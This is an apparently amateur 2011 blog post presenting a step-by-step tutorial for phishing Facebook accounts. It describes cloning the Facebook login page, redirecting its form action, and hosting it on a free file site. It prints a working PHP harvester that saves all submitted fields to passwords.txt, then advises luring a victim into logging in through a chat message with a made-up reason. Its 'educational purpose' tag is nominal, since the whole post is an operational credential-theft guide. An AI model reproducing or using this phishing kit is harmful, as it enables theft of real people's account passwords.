Friday, January 28, 2011

How to hack facebook password?? :O

One of the most popular social networking sites is facebook these days. And hacking a facebook account is also of intrest of most people

The way i am using to hack fb account is by PHISHING.(for educational purpose)
CONCEPT OF PHISHING :
phishing is just a type of hacking in which a victim  is provided with a link which when he clicks a clone site(which is made by us)  is opened (in our case facebook login page) in which when he enters his info and the info is extracted to us!!

SO JUST FOLLOW THE STEPS TO ENJOY THE FUN :-

1.  Just go to the facebook login page and right click and selcet view page source




2. select the whole sorce code and copy it

3. Open the notepad and paste the code over there 





Code pasted on notepad...notice file has been saved as LOGIN.PHP
 


4.Now one of the most important point is the editing part in the code because if we wont edit the code the code wold be opening the real site instead our fake site,so press cltrl+f while viewing the code in notepad and type "action" in search bar

5.when you find the word action it would be followed by a statment as:-
 action="https://login.facebook.com/login.php?login_attempt=1"
just remove the https://login.facebook.com/login.php?login_attempt=1 part
and instead write"phishing.php" 
 
 
6. After completing the editing part of code save the file as "LOGIN.PHP"
7. Now moving forward open a file uploading site by clicking this link --->  http://www.ripway.com/
  
8. sign up (create a account) on ripway.com

9. sign in to your account then now from the upper toolbar select "my files"

10. select create text file.

11.now enter the file name as "LOGIN.PHP"

12.Now open the notepad file which we had created in step 3
13. select the code from notepad copy it and paste it at login.php file in ripway.com

14.select create tab

15.Now create another text file, again select create text file
14.Name the file as "PHISHING.PHP"
15.now copy the given below code:-
<?php
header ('location: http://h1.ripway.com/your ripway account name here/login.php ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
16. paste the code for the "PHISHING.PHP" file in ripway.com
17.Now comes the most important editing part in the code. you wil notice a line saying "your ripway account name here" edit the line and instead write your ripway account username instead and click create tab.
                                        i have wrtten "test" as my username is "test" for ripway login

18.Now the technical part of the blog is over, which means we have made our clone site ! :D
19.Now to open your site, again click "my files" on upper toolbar in ripway and you will see your two files
20.Just open the link in another tab given right below of "LOGIN.PHP"
                                               the inside arrow showing the link of our clone site

21.Wooohooo! here's your facebook clone site ;)
                                 your facebook login clonepage,arrow showing the url you created

22.Now comes the intresting part, testing your site ! just put your username in facebook login page for example : "test@test.com" and password as: "test" and press login

23.You will notice nothing happens but here comes the intresting part just go to your my files in ripway and click refresh , you will notice a "PASSWORD.TXT" file is created!

24.just click on the file, and what do you notice?? you notice that YOU DID IT ! :D :D
   first arrow: showing the email id which we had entered   "test@test.com"
  second arrow: showing the extracted password (which is "test" in our case) extracted from the victim

25.So now you have to give the link (below the login.php file which is your clone login facebook page link) to a victim and make him enter the info. And one of the best place to give the link is while chatting with your victim online, making any silly reason...  i know it sounds kinda stupid that why would he login while he is online but belive me no one just thinks about it and carries on logging in. So well you may think of more ideas of how to give the link to the victim so good luck !! :)


If any more help needed feel free to ask by commenting in the blog( you may even suggest something) and i will surely like to figure it out .If u like the blog please click some adds on the blog and if not then its fine :) :P

this is Bharat nagalia signing off, keep joining for more hacking updates
thank you. \m/>(^_^)>\m/